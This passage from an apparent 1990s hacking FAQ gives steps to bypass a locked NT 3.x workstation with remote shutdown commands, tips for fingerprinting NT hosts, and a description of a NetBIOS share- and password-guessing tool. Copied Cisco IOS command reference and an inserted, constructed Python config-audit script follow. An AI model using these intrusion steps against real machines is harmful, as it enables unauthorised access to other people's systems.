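    print("misordered, ALICE write    :", access_check(HOME_DIR_MISORDERED, alice, WRITE))
    print("no DACL,    ALICE delete   :", access_check(UNPROTECTED, alice, DELETE))
    print("empty DACL, owner read     :", access_check(LOCKED_BUT_OWNED, alice, READ))
    print("empty DACL, owner WRITE_DAC:", access_check(LOCKED_BUT_OWNED, alice, WRITE_DAC))
```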
      [11.1.9] Once in, how can I do all that GUI stuff?
      The main problem is adjusting NT file security attributes. Some utilities are available with NT that can be used, but I'd recommend using the NT Command Line Security Utilities. They include:
      saveacl.exe - saves file, directory and ownership permissions to a file
      restacl.exe - restores file permissions and ownership from a saveacl file
      listacl.exe - lists file permissions in human readable format
      swapacl.exe - swaps permissions from one user or group to another
      grant.exe - grants permissions to users/groups on files
      revoke.exe - revokes permissions to users/groups on files
      igrant.exe - grants permissions to users/groups on directories
      irevoke.exe - revokes permissions to users/groups on directories
      setowner.exe - sets the ownership of files and directories
      nu.exe - 'net use' replacement, shows the drives you're connected to
      The latest version can be found at:
      ftp://ftp.netcom.com/pub/wo/woodardk/
      [11.2.0] How do I bypass the screen saver?
      If a user has locked their local workstation using CTRL+ALT+DEL, and you can log in as an administrator, you will have a window of a few seconds where you will see the user's desktop, and even manipulate things. This trick works on NT 3.5 and 3.51, unless the latest service pack has been loaded.
      If the service pack has been loaded, but it's still 3.X, try the following.
      - From another NT workstation, type the following command:
      shutdown \\<target_computer> /t:30
      - This will start a 30 second shutdown on the target and a Security window will pop up.
      - Cancel the shutdown with the following command:
      shutdown \\<target_computer> /a
      - The screen saver will kick back in.
      - Wiggle the mouse on the target. The screen will go blank.
      - Now do a ctrl-alt-del on the target.
      - An NT Security window will appear. Select cancel.
      - You are now at the Program Manager.
      [11.2.1] How can I tell if it's an NT box?
      Hopefully it is a web server, and they've simply stated proudly "we're running NT", but don't expect that...
      Port scanning will find some. Typically you'll see port 135 open. This is no guarantee it's not Windows 95, however. Using Samba you should be able to connect and query for the existence of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check \CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first as Everyone has read permissions here by default.
      Port 137 is used for running NetBios over IP, and since in the Windows world NetBios is used, certainly you can expect port 137 to be open if IP is anywhere in use around NT.
      Another possible indication is checking for port 139. This tells you your target is advertising an SMB resource to share info, but it could be any number of things, such as a Windows 95 machine or even Windows for Workgroups. These may not be entirely out of the question as potential targets, but if you are after NT you will have to use a combination of the aforementioned techniques coupled with some common sense.
      To simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on remote systems.
      [11.2.2] What exactly does the NetBios Auditing Tool do?
      Developed by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the complete source code. It is the "SATAN" of NetBios based systems.
      Here is a quote from Secure Networks Inc about the product -
      "The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services offered by the target system. It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client.
      The major steps are as follows:
      A UDP status query is sent to the target, which usually elicits a reply containing the Netbios "computer name". This is needed to establish a session. The reply also can contain other information such as the workgroup and account names of the machine's users. This part of the program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent back to UDP port 137 even if the original query came from some different port.
      TCP connections are made to the target's Netbios port [139], and session requests using the derived computer name are sent across. Various guesses at the computer name are also used, in case the status query failed or returned incomplete information. If all such attempts to establish a session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was reachable.
      Provided a connection is established Netbios "protocol levels" are now negotiated across the new connection. This establishes various modes and capabilities the client and server can use with each other, such as password encryption and if the server uses user-level or share-level Security. The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that protocol is somewhat simpler and uses a smaller password keyspace than NT.
      If the server requires further session setup to establish credentials, various defaults are attempted. Completely blank usernames and passwords are often allowed to set up "guest" connections to a server; if this fails then guesses are tried using fairly standard account names such as ADMINISTRATOR, and some of the names returned from the status query. Extensive username/password checking is NOT done at this point, since the aim is just to get the session established, but it should be noted that if this phase is reached at all MANY more guesses can be attempted and likely without the owner of the target being immediately aware of it.
      Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers.
      Attempts are then made to connect to all listed file system shares and some potentially unlisted ones. If the server requires passwords for the shares, defaults are attempted as described above for session setup. Any successful connections are then explored for writeability and some well-known file-naming problems [the ".." class of bugs].
      If a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable" with the remaining question being to what extent. Information is collected under the appropriate vulnerability at most of these steps, since any point along the way may be blocked by the Security configurations of the target. Most Microsoft-OS based servers and Unix SAMBA will yield computer names and share lists, but not allow actual file-sharing connections without a valid username and/or password. A remote connection to a share is therefore a possibly serious Security problem, and a connection that allows WRITING to the share almost certainly so.
      Printer and other "device" services offered by the server are currently ignored."
      If you need more info on NAT, try looking at this web location:
      http://www.secnet.com/ntinfo/ntaudit.html
      http://www.rhino9.org
      [12.0.0] Cisco Routers and their configuration
      Many, many hackers and security professionals alike take routers for granted. Well, I have a news flash for you: if your routers go down, so does your network. We have included this section to attempt to educate system administrators on configuring Cisco routers. Keep in mind that Cisco is, to date, the most widely used and common router. And for good reason, it’s a damn good router. Kudos to Cisco for making an excellent product. (NOTE: The rhino9 team did not sell, or make a profit off of this publication in any way, shape or form.) The information below was retrieved from the Cisco website (www.cisco.com). Copyright 1988-1997 © Cisco Systems Inc.
      Many times, routers will not have passwords configured (this is mainly due to ignorant administrators… HEY.. Hire someone that knows what they're doing… like a security professional or a Cisco Engineer…. Geeesh.)
       
      [12.0.1] User Interface Commands
      This chapter describes the commands used to enter and exit the various Cisco Internetwork Operating System (Cisco IOS) configuration command modes. It provides a description of the help command and help features, lists the command editing keys and functions, and details the command history feature.
      You can abbreviate the syntax of Cisco IOS configuration commands. The software recognizes a command when you enter enough characters of the command to uniquely identify it.
      For user interface task information and examples, see the "Understanding the User Interface" chapter of the Configuration Fundamentals Configuration Guide.
      [12.0.2] disable
      To exit privileged EXEC mode and return to user EXEC mode, enter the disable EXEC command.
      disable [level]
      Syntax Description
      level (Optional) Specifies the user-privilege level.
      Note The disable command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege level.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Use this command with the level option to reduce the user-privilege level. If a level is not specified, it defaults to the user EXEC mode, which is level 1.
      Example
      In the following example, entering the disable command causes the system to exit privileged EXEC mode and return to user EXEC mode as indicated by the angle bracket (>):
      Router# disable
      Router>
      Related Command
      enable
      [12.0.3] editing
      To enable enhanced editing mode for a particular line, use the editing line configuration command. To disable the enhanced editing mode, use the no form of this command.
      editing
      no editing
      Syntax Description
      This command has no arguments or keywords.
      Default
      Enabled
      Command Mode
      Line configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Keys Function
      Tab Completes a partial command name entry. When you enter a unique set of characters and press the Tab key, the system completes the command name. If you enter a set of characters that could indicate more than one command, the system beeps to indicate an error. Enter a question mark (?) immediately following the partial command (no space). The system provides a list of commands that begin with that string.
      Delete or Backspace Erases the character to the left of the cursor.
      Return At the command line, pressing the Return key performs the function of processing a command. At the "---More---" prompt on a terminal screen, pressing the Return key scrolls down a line.
      Space Bar Allows you to see more output on the terminal screen. Press the space bar when you see the line "---More---" on the screen to display the next screen.
      Left Arrow Moves the cursor one character to the left. When you enter a command that extends beyond a single line, you can press the Left Arrow key repeatedly to scroll back toward the system prompt and verify the beginning of the command entry.
      Right Arrow1 Moves the cursor one character to the right.
      Up Arrow1 or Ctrl-P Recalls commands in the history buffer, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
      Down Arrow1 or Ctrl-N Returns to more recent commands in the history buffer after recalling commands with the Up Arrow or Ctrl-P. Repeat the key sequence to recall successively more recent commands.
      Ctrl-A Moves the cursor to the beginning of the line.
      Ctrl-B Moves the cursor back one character.
      Ctrl-D Deletes the character at the cursor.
      Ctrl-E Moves the cursor to the end of the command line.
      Ctrl-F Moves the cursor forward one character.
      Ctrl-K Deletes all characters from the cursor to the end of the command line.
      Ctrl-L and Ctrl-R Redisplays the system prompt and command line.
      Ctrl-T Transposes the character to the left of the cursor with the character located at the cursor.
      Ctrl-U and Ctrl-X Deletes all characters from the cursor back to the beginning of the command line.
      Ctrl-V and Esc Q Inserts a code to indicate to the system that the keystroke immediately following should be treated as a command entry, not as an editing key.
      Ctrl-W Deletes the word to the left of the cursor.
      Ctrl-Y Recalls the most recent entry in the delete buffer. The delete buffer contains the last ten items you have deleted or cut. Ctrl-Y can be used in conjunction with Esc Y.
      Ctrl-Z Ends configuration mode and returns you to the EXEC prompt.
      Esc B Moves the cursor back one word.
      Esc C Capitalizes the word from the cursor to the end of the word.
      Esc D Deletes from the cursor to the end of the word.
      Esc F Moves the cursor forward one word.
      Esc L Changes the word to lowercase at the cursor to the end of the word.
      Esc U Capitalizes from the cursor to the end of the word.
      Esc Y Recalls the next buffer entry. The buffer contains the last ten items you have deleted. Press Ctrl-Y first to recall the most recent entry. Then press Esc Y up to nine times to recall the remaining entries in the buffer. If you bypass an entry, continue to press Esc Y to cycle back to it.
      The arrow keys function only with ANSI-compatible terminals.
      Key Function
      Delete or Backspace Erases the character to the left of the cursor.
      Ctrl-W Erases a word.
      Ctrl-U Erases a line.
      Ctrl-R Redisplays a line.
      Ctrl-Z Ends configuration mode and returns to the EXEC prompt.
      Return Executes single-line commands.
      Example
      In the following example, enhanced editing mode is disabled on line 3:
      line 3
      no editing
      Related Command
      A dagger (†) indicates that the command is documented outside this chapter.
      terminal editing
       
      [12.0.4] enable
      To enter privileged EXEC mode, use the enable EXEC command.
      enable [level]
      Syntax Description
      level (Optional) Privileged level on which to log in.
      Note The enable command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege level.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Because many of the privileged commands set operating parameters, privileged access should be password-protected to prevent unauthorized use. If the system administrator has set a password with the enable password global configuration command, you are prompted to enter it before being allowed access to privileged EXEC mode. The password is case sensitive.
      If an enable password has not been set, enable mode only can be accessed from the router console. If a level is not specified, it defaults to the privileged EXEC mode, which is level 15.
      Example
      In the following example, the user enters the enable command and is prompted to enter a password. The password is not displayed on the screen. After the user enters the correct password, the system enters privileged command mode as indicated by the pound sign (#).
      Router> enable
      Password:
      Router#
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      disable
      enable password
       
      [12.0.5] end
      To exit configuration mode, or any of the configuration submodes, use the end global configuration command.
      end
      Syntax Description
      This command has no arguments or keywords.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      You can also press Ctrl-Z to exit configuration mode.
      Example
      In the following example, the name is changed to george using the hostname global configuration command. Entering the end command causes the system to exit configuration mode and return to EXEC mode.
      Router(config)# hostname george
      george(config)# end
      george#
      Related Command
      A dagger (†) indicates that the command is documented outside this chapter.
      hostname
       
      [12.0.6] exit
      To exit any configuration mode or close an active terminal session and terminate the EXEC, use the exit command at the system prompt.
      exit
      Syntax Description
      This command has no arguments or keywords.
      Command Mode
      Available in all command modes.
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Use the exit command at the EXEC levels to exit the EXEC mode. Use the exit command at the configuration level to return to privileged EXEC mode. Use the exit command in interface, line, router, IPX-router, and route-map command modes to return to global configuration mode. Use the exit command in subinterface configuration mode to return to interface configuration mode. You also can press Ctrl-Z, or use the end command, from any configuration mode to return to privileged EXEC mode.
      Note The exit command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege level.
      Examples
      In the following example, the user exits subinterface configuration mode to return to interface configuration mode:
      Router(config-subif)# exit
      Router(config-if)#
      The following example shows how to exit an active session.
      Router> exit
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      disconnect
      end
      logout
       
      [12.0.7] full-help
      To get help for the full set of user-level commands, use the full-help command.
      full-help
      Syntax Description
      This command has no arguments or keywords.
      Default
      Disabled
      Command Mode
      Available in all command modes.
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The full-help command enables (or disables) an unprivileged user to see all of the help messages available. It is used with the show ? command.
      Example
      The following example is output for show ? with full-help disabled:
      Router> show ?
      clock Display the system clock
      history Display the session command history
      hosts IP domain-name, lookup style, nameservers, and host table
      sessions Information about Telnet connections
      terminal Display terminal configuration parameters
      users Display information about terminal lines
      version System hardware and software status
      Related Command
      help
      [12.0.8] help
      To display a brief description of the help system, enter the help command.
      help
      Syntax Description
      This command has no arguments or keywords.
      Command Mode
      Available in all command modes.
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The help command provides a brief description of the context-sensitive help system.
      • To list all commands available for a particular command mode, enter a question mark (?) at the system prompt.
      • To obtain a list of commands that begin with a particular character string, enter the abbreviated command entry immediately followed by a question mark (?). This form of help is called word help, because it lists only the keywords or arguments that begin with the abbreviation you entered.
      • To list a command's associated keywords or arguments, enter a question mark (?) in place of a keyword or argument on the command line. This form of help is called command syntax help, because it lists the keywords or arguments that apply based on the command, keywords, and arguments you have already entered.
      Note The help command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege level.
      Examples
      Enter the help command for a brief description of the help system:
      Router# help
      Help may be requested at any point in a command by entering
      a question mark '?'. If nothing matches, the help list will
      be empty and you must backup until entering a '?' shows the
      available options.
      Two styles of help are provided:
      1. Full help is available when you are ready to enter a
      command argument (e.g. 'show ?') and describes each possible
      argument.
      2. Partial help is provided when an abbreviated argument is entered
      and you want to know what arguments match the input
      (e.g. 'show pr?'.)
      The following example shows how to use word help to display all the privileged EXEC commands that begin with the letters "co":
      Router# co?
      configure connect copy
      The following example shows how to use command syntax help to display the next argument of a partially complete access-list command. One option is to add a wildcard mask. The <cr> symbol indicates that the other option is to press Return to execute the command.
      Router(config)# access-list 99 deny 131.108.134.234 ?
      A.B.C.D Mask of bits to ignore
      <cr>
      Related Command
      full-help
      [12.0.9] history
      To enable the command history function, or to change the command history buffer size for a particular line, use the history line configuration command. To disable the command history feature, use the no form of this command.
      history [size number-of-lines]
      no history [size number-of-lines]
      Syntax Description
      size number-of-lines (Optional) Specifies the number of command lines that the system will record in its history buffer. The range is 0 to 256.
      Default
      10 lines
      Command Mode
      Line configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The history command without the size keyword and the number-of-lines argument enables the history function with the last buffer size specified or with the default of 10 lines, if there was not a prior setting.
      The no history command without the size keyword and the number-of-lines argument disables the history feature but remembers the buffer size if it was something other than the default. The no history size command resets the buffer size to 10.
      Note The history size command only sets the size of the buffer; it does not reenable the history feature. If the no history command is used, the history command must be used to reenable this feature.
      The command history feature provides a record of EXEC commands that you have entered. This feature is particularly useful for recalling long or complex commands or entries, including access lists.
      Key Functions
      Ctrl-P or Up Arrow Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
      Ctrl-N or Down Arrow1 Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the Up Arrow. Repeat the key sequence to recall successively more recent commands.
      1 The arrow keys function only with ANSI-compatible terminals such as VT100s.
      Example
      In the following example, line 4 is configured with a history buffer size of 35 lines:
      line 4
      history size 35
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      show history
      terminal history size
       
      [12.1.0] ip http access-class
      To assign an access-list to the http server used by the Cisco IOS ClickStart software or the Cisco Web browser interface, use the ip http access-class global configuration command. To remove the assigned access list, use the no form of this command.
      ip http access-class {access-list-number | name}
      no ip http access-class {access-list-number | name}
      Syntax Description
      access-list-number Standard IP access list number in the range 0 to 99, as configured by the access-list (standard) command.
      name Name of a standard IP access list, as configured by the ip access-list command.
      Default
      There is no access list applied to the http server.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      If this command is configured, the specified access list is assigned to the http server. Before the http server accepts a connection, it checks the access list. If the check fails, the http server does not accept the request for a connection.
      Example
      The following command assigns the access list named marketing to the http server:
      ip http access-class marketing
      ip access-list standard marketing
      permit 192.5.34.0 0.0.0.255
      permit 128.88.0.0 0.0.255.255
      permit 36.0.0.0 0.255.255.255
      ! (Note: all other access implicitly denied)
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      ip access-list
      ip http server
      [12.1.1] ip http port
      To specify the port to be used by the Cisco IOS ClickStart software or the Cisco Web browser interface, use the ip http port global configuration command. To use the default port, use the no form of this command.
      ip http port number
      no ip http port
      Syntax Description
      number Port number for use by ClickStart or the Cisco Web browser interface. The default is 80.
      Default
      80
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      Use this command if ClickStart or the Cisco Web browser interface cannot use port 80.
      Example
      The following command configures the router so that you can use ClickStart or the Cisco Web browser interface via port 60:
      ip http server
      ip http port 60
      Related Command
      ip http server
      [12.1.2] ip http server
      To enable a Cisco 1003, Cisco 1004, or Cisco 1005 router to be configured from a browser using the Cisco IOS ClickStart software, and to enable any router to be monitored or have its configuration modified from a browser using the Cisco Web browser interface, use the ip http server global configuration command. To disable this feature, use the no form of this command.
      ip http server
      no ip http server
      Syntax Description
      This command has no arguments or keywords.
      Default
      This feature is enabled on Cisco 1003, Cisco 1004, and Cisco 1005 routers that have not yet been configured. For Cisco 1003, Cisco 1004, and Cisco 1005 routers that have already been configured, and for all other routers, this feature is disabled.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      Example
      The following command configures the router so that you can use the Cisco Web browser interface to issue commands to it:
      ip http server
      Related Commands
      ip http access-class
      ip http port
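      The following Python script is an added example, not part of this reference or of Cisco IOS: it audits a running-config excerpt for the settings discussed in 12.0.4 (enable), 12.1.0 (ip http access-class), 12.1.1 (ip http port) and 12.1.2 (ip http server). The sample configurations, function names and finding texts are constructed here; the script also accepts enable secret, the hashed form of the enable password that is documented outside this chapter.

```python
"""Audit a Cisco IOS running-config excerpt for the weak settings the
reference warns about: an unprotected privileged EXEC mode (12.0.4) and an
HTTP server with no access-class limiting who may connect (12.1.0/12.1.2).

Added example; the configs and finding strings below are constructed.
"""
import re

# Constructed sample: HTTP server on, no access list, no enable password.
WEAK_CONFIG = """\
hostname george
!
ip http server
ip http port 60
!
line vty 0 4
 login
"""

# Constructed sample: same router with the protections the reference names.
HARDENED_CONFIG = """\
hostname george
!
enable password example-only
!
ip access-list standard marketing
 permit 192.5.34.0 0.0.0.255
 permit 128.88.0.0 0.0.255.255
!
ip http server
ip http access-class marketing
"""

ACL_ENTRY = re.compile(r"^(permit|deny|remark)\b")
NUMBERED_ACL = re.compile(r"^access-list (\d+) (permit|deny|remark)\b")
NAMED_ACL = re.compile(r"^ip access-list standard (\S+)$")


def parse_standard_acls(config):
    """Return {name_or_number: [entry lines]} for the standard IP ACLs.

    Handles both forms 12.1.0 accepts: numbered 0-99 (`access-list 10 permit
    ...`) and named (`ip access-list standard NAME` followed by its entries,
    indented as in `show running-config` or flush-left as in the reference).
    """
    acls = {}
    current = None
    for raw in config.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue  # '!' is an IOS comment/separator; it carries no config
        m = NUMBERED_ACL.match(line)
        if m:
            if 0 <= int(m.group(1)) <= 99:  # standard range named in 12.1.0
                acls.setdefault(m.group(1), []).append(line)
            current = None
            continue
        m = NAMED_ACL.match(line)
        if m:
            current = m.group(1)
            acls.setdefault(current, [])
            continue
        if current is not None and ACL_ENTRY.match(line):
            acls[current].append(line)
            continue
        current = None  # any other line ends the named ACL block
    return acls


def audit_config(config):
    """Return a list of finding strings; an empty list means nothing flagged."""
    findings = []
    lines = [l.strip() for l in config.splitlines()]

    # 12.0.4: privileged access should be password-protected. `enable secret`
    # (hashed form, documented outside this chapter) counts as well.
    if not any(l.startswith(("enable password ", "enable secret ")) for l in lines):
        findings.append("no enable password set: privileged EXEC mode is not "
                        "password-protected (see 12.0.4)")

    if "ip http server" not in lines:
        return findings  # HTTP server disabled: nothing further to check

    acl_ref, port = None, "80"
    for l in lines:
        m = re.match(r"^ip http access-class (\S+)$", l)
        if m:
            acl_ref = m.group(1)
        m = re.match(r"^ip http port (\d+)$", l)
        if m:
            port = m.group(1)

    if acl_ref is None:
        findings.append("ip http server is enabled with no ip http access-class: "
                        "any reachable host may connect (see 12.1.0)")
    else:
        entries = parse_standard_acls(config).get(acl_ref)
        if entries is None:
            findings.append(f"ip http access-class {acl_ref} refers to an access "
                            "list not defined in this config: the restriction "
                            "cannot be relied on")
        elif not any(re.search(r"\bpermit\b", e) for e in entries):
            findings.append(f"access list {acl_ref} has no permit entry: the "
                            "implicit deny refuses every HTTP connection")
    if port != "80":
        findings.append(f"ip http port {port}: non-default port, make sure scans "
                        "and monitoring cover it (see 12.1.1)")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit_config(cfg) or ['no findings']}")
```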
      [12.1.3] menu (EXEC)
      Use the menu EXEC command to invoke a user menu.
      menu name
      Syntax Description
      name The configuration name of the menu.
      Command Mode
      User EXEC mode or privileged EXEC mode
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      A menu can be invoked at either the user or privileged EXEC level, but if an item in the menu contains a privileged EXEC command, the user must be logged in at the privileged level for the command to succeed.
      Example
      The following example shows how to invoke the menu named Access1:
      menu Access1
      [12.1.4] menu (global)
      Use the menu global configuration command with the appropriate keyword to specify menu-display options. Use the no form of the global configuration command to delete a specified, or named, menu from the configuration.
      menu name [clear-screen | line-mode | single-space | status-line]
      no menu name
      Syntax Description
      name The configuration name of the menu.
      clear-screen (Optional) Clears the terminal screen before displaying a menu.
      line-mode (Optional) In a menu of nine or fewer items, you ordinarily select a menu item by entering the item number. In line mode, you select a menu entry by entering the item number and pressing Return. Line mode allows you to backspace over the selected number and enter another number before pressing Return to execute the command. This option is activated automatically when more than nine menu items are defined but also can be configured explicitly for menus of nine or fewer items.
      single-space (Optional) Displays menu items single-spaced rather than double-spaced. This option is activated automatically when more than nine menu items are defined but also can be configured explicitly for menus of nine or fewer items.
      status-line (Optional) Displays a line of status information about the current user.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The clear-screen option uses a terminal-independent mechanism based on termcap entries defined in the router and the terminal type configured for the user's terminal. The clear-screen option allows the same menu to be used on multiple types of terminals instead of having terminal-specific strings embedded within menu titles. If the termcap entry does not contain a clear string, the menu system enters 24 newlines, causing all existing text to scroll off the top of the terminal screen.
      The status-line option displays the status information at the top of the screen before the menu title is displayed. This status line includes the router's host name, the user's line number, and the current terminal type and keymap type (if any).
      A menu can be activated at the user EXEC level or at the privileged EXEC level, depending upon whether the given menu contains menu entries using privileged commands.
      When a particular line should always display a menu, that line can be configured with an autocommand configuration command. The menu should not contain any exit paths that leave users in an unfamiliar interface environment.
      Menus can be run on a per-user basis by defining a similar autocommand for that local username.
      Examples
      The following example shows how to invoke the menu named Access1:
      menu Access1
      The following example shows how to display the status information using the status-line option for the menu named Access1:
      menu Access1 status-line
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      menu command
      menu text
      menu title
      resume
       
      [12.1.5] menu command
      Use the menu command global configuration command to specify underlying commands for user interface menus.
      menu name command number
      Syntax Description
      name The configuration name of the menu. You can specify a maximum of 20 characters.
      number The selection number associated with the menu entry. This number is displayed to the left of the menu entry. You can specify a maximum of 18 menu entries. When the tenth item is added to the menu, the line-mode and single-space options are activated automatically.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The menu command and menu text commands define a menu entry. These commands must use the same menu name and menu selection number.
      The menu command has a special option, menu-exit, that is available only within menus. It is used to exit a submenu and return to the previous menu level or exit the menu altogether and return to the EXEC command prompt.
      You can create submenus that are opened by selecting a higher-level menu entry. Use the menu command to invoke a menu as the command in a line specifying a higher-level menu entry.
      Note If you nest too many levels of menus, the system prints an error message on the terminal and returns to the previous menu level.
      When a menu allows connections (their normal use), the command for an entry activating the connection should contain a resume command, or the line should be configured to prevent users from escaping their sessions with the escape-char none command. Otherwise, when they escape from a connection and return to the menu, there will be no way to resume the session and it will sit idle until the user logs off.
      Specifying the resume command as the action that is performed for a selected menu entry permits a user to resume a named connection or connect using the specified name, if there is no active connection by that name. As an option, you can also supply the connect string needed to connect initially. When you do not supply this connect string, the command uses the specified connection name.
      You can also use the resume/next command, which resumes the next connection in the user's list of connections. This function allows you to create a single menu entry that steps through all of the user's connections.
      Refer to the Access Services Configuration Guide for more information on the menu command.
      Example
      The following example shows how to specify the commands to be executed when a user enters the selection number associated with the menu entry for the menu named Access1:
      menu Access1 command 1 tn3270 vms.cisco.com
      menu Access1 command 2 rlogin unix.cisco.com
      menu Access1 command 3 menu-exit
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      menu (global)
      menu text
      menu title
      resume
       
      [12.1.6] menu text
      Use the menu text global configuration command to specify the text of a menu item in a user interface menu.
      menu name text number
      Syntax Description
      name The configuration name of the menu. You can specify a maximum of 20 characters.
      number The selection number associated with the menu item. This number is displayed to the left of the menu item. You can specify a maximum of 18 menu items. When the tenth item is added to the menu, the line-mode and single-space options are activated automatically.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The menu text command and the menu command define a menu item. These commands must use the same menu name and menu selection number.
      You can specify a maximum of 18 items in a menu.
      Example
      The following example shows how to specify the descriptive text for the three entries in the menu Access1:
      menu Access1 text 1 IBM Information Systems
      menu Access1 text 2 UNIX Internet Access
      menu Access1 text 3 Exit menu system
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      menu (global)
      menu command
      menu title
      resume
       
      [12.1.7] menu title
      Use the menu title global configuration command to create a title, or banner, for a user menu.
      menu name title delimiter
      Syntax Description
      name The configuration name of the menu. You can specify a maximum of 20 characters.
      delimiter Characters that mark the beginning and end of a title. Text delimiters are characters that do not ordinarily appear within the text of a title, such as slash ( / ), double quote ("), and tilde ( ~ ). Ctrl-C is reserved for special use and should not be used in the text of the title.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The menu title command must use the same menu name used with the menu text and menu command commands used to create a menu.
      You can position the title of the menu horizontally by preceding the title text with blank characters. You can also add lines of space above and below the title by pressing Return.
      Follow the title keyword with one or more blank characters and a delimiting character of your choice. Then enter one or more lines of text, ending the title with the same delimiting character. You cannot use the delimiting character within the text of the message.
      When you are configuring from a terminal and are attempting to include special control characters, such as a screen-clearing string, you must use Ctrl-V before the special control characters so that they are accepted as part of the title string. The string ^[[H^[[J is an escape string used by many VT100-compatible terminals to clear the screen. To use a special string, you must enter Ctrl-V before each escape character.
      You also can use the clear-screen option of the menu command to clear the screen before displaying menus and submenus, instead of embedding a terminal-specific string in the menu title. The clear-screen option allows the same menu to be used on different types of terminals.
      Example
      The following example specifies the title that will be displayed when the menu Access1 is invoked:
      cs101(config)# menu Access1 title /^[[H^[[J
      Welcome to Access1 Internet Services
      Type a number to select an option;
      Type 9 to exit the menu.
      /
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      menu (global)
      menu command
      menu text
      resume
       
      [12.1.8] show history
      To list the commands you have entered in the current EXEC session, use the show history EXEC command.
      show history
      Syntax Description
      This command has no arguments or keywords.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The command history feature provides a record of EXEC commands you have entered. The number of commands that the history buffer will record is determined by the history size line configuration command or the terminal history size EXEC command.
      Key Function
      Ctrl-P or Up Arrow Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
      Ctrl-N or Down Arrow Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the Up Arrow. Repeat the key sequence to recall successively more recent commands.
      Sample Display
      The following is sample output from the show history command, which lists the commands the user has entered in EXEC mode for this session:
      Router# show history
      help
      where
      show hosts
      show history
      Router#
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      history size
      terminal history size
       
      [12.1.9] terminal editing
      To enable the enhanced editing mode on the local line, use the terminal editing EXEC command. To disable the enhanced editing mode on the current line, use the no form of this command.
      terminal editing
      terminal no editing
      Syntax Description
      This command has no arguments or keywords.
      Default
      Enabled
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Keys Function
      Tab Completes a partial command name entry. When you enter a unique set of characters and press the Tab key, the system completes the command name. If you enter a set of characters that could indicate more than one command, the system beeps to indicate an error. Enter a question mark (?) immediately following the partial command (no space). The system provides a list of commands that begin with that string.
      Delete or Backspace Erases the character to the left of the cursor.
      Return At the command line, pressing the Return key performs the function of processing, or carrying out, a command. At the " ---More--- " prompt on a terminal screen, pressing the Return key scrolls down a line.
      Space Bar Scrolls down a page on the terminal screen. Press the space bar when you see the line " ---More--- " on the screen to display the next screen.
      Left arrow Moves the cursor one character to the left. When you enter a command that extends beyond a single line, you can continue to press the left arrow key at any time to scroll back toward the system prompt and verify the beginning of the command entry.
      Right arrow1 Moves the cursor one character to the right.
      Up arrow1 or Ctrl-P Recalls commands in the history buffer, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
      Down arrow1 or Ctrl-N Returns to more recent commands in the history buffer after recalling commands with the Up arrow or Ctrl-P. Repeat the key sequence to recall successively more recent commands.
      Ctrl-A Moves the cursor to the beginning of the line.
      Ctrl-B Moves the cursor back one character.
      Ctrl-D Deletes the character at the cursor.
      Ctrl-E Moves the cursor to the end of the command line.
      Ctrl-F Moves the cursor forward one character.
